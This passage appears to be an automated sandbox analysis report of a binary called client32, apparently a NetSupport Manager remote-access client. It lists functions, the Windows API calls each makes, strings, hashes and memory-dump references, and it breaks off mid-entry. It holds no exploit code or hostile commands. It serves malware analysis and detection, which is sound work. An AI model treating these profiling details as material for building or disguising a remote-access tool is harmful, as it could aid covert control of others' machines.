                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                              • API String ID: 2577986331-1331251348
                                                                              • Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                              • Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
                                                                              • Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                              • Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9
                                                                              Function 1103F4C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
                                                                                • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
                                                                                • Part of subcall function 1103F450: Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF
                                                                              • IsWindow.USER32(00000000), ref: 1103F4EA
                                                                              • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD
                                                                              Strings
                                                                              • PCIVideoSlave32, xrefs: 1103F508
                                                                              • DoMMData - could not find %s window, xrefs: 1103F50D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Find$MessageSendSleep
                                                                              • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                                              • API String ID: 1010850397-3146847729
                                                                              • Opcode ID: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                              • Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
                                                                              • Opcode Fuzzy Hash: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                              • Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB
                                                                              Function 11081680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 110816D7
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                              • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                              • API String ID: 2441568934-1875806619
                                                                              • Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                              • Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
                                                                              • Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                              • Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2
                                                                              Function 1103D1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,759223A0,1100BF7B), ref: 11110928
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                              • _free.LIBCMT ref: 1103D221
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                              • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                              • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                              Strings
                                                                              • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                              • String ID: Show has overrun too much, aborting
                                                                              • API String ID: 304545663-4092325870
                                                                              • Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                              • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
                                                                              • Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                              • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                              Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                              • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 1136984157-1986719024
                                                                              • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                              • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                              • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                              • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                              Function 11027530 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23sleepthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnumExitSleepThreadWindows
                                                                              • String ID: TapiFix
                                                                              • API String ID: 1804117399-2824097521
                                                                              • Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                              • Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
                                                                              • Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                              • Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
                                                                              Function 1101D410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 1101D43F
                                                                              • ShowWindow.USER32(00000000), ref: 1101D446
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 1319256379-1986719024
                                                                              • Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                              • Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
                                                                              • Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                              • Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
                                                                              Function 11165643 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                              • String ID:
                                                                              • API String ID: 2782032738-0
                                                                              • Opcode ID: 34f750520889ae1c8a8219b8bb8fb379717b18fbdc33fa4f6fc2ff7c413ea70f
                                                                              • Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
                                                                              • Opcode Fuzzy Hash: 34f750520889ae1c8a8219b8bb8fb379717b18fbdc33fa4f6fc2ff7c413ea70f
                                                                              • Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40
                                                                              Function 11067900 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MessageBeep.USER32(00000000), ref: 1106791B
                                                                              • MessageBeep.USER32(00000000), ref: 11067957
                                                                              • MessageBeep.USER32(00000000), ref: 110679AA
                                                                              • MessageBeep.USER32(00000000), ref: 110679EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: BeepMessage
                                                                              • String ID:
                                                                              • API String ID: 2359647504-0
                                                                              • Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                              • Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
                                                                              • Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                              • Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1
                                                                              Function 11049130 Relevance: 6.1, APIs: 4, Instructions: 112windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                              • _malloc.LIBCMT ref: 110491DD
                                                                              • _memmove.LIBCMT ref: 110491EA
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,00040414,?,00000002,00001388,?), ref: 11049224
                                                                              • _free.LIBCMT ref: 1104922B
                                                                                • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                              • String ID:
                                                                              • API String ID: 176360892-0
                                                                              • Opcode ID: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                              • Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
                                                                              • Opcode Fuzzy Hash: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                              • Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
                                                                              Function 110297F0 Relevance: 6.1, APIs: 4, Instructions: 104sleepthreadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00001000,11027690,00000000,00000000,111EE468), ref: 11029813
                                                                              • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029832
                                                                              • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029854
                                                                              • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102985C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: SleepThread$CreateMessagePost
                                                                              • String ID:
                                                                              • API String ID: 3347742789-0
                                                                              • Opcode ID: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
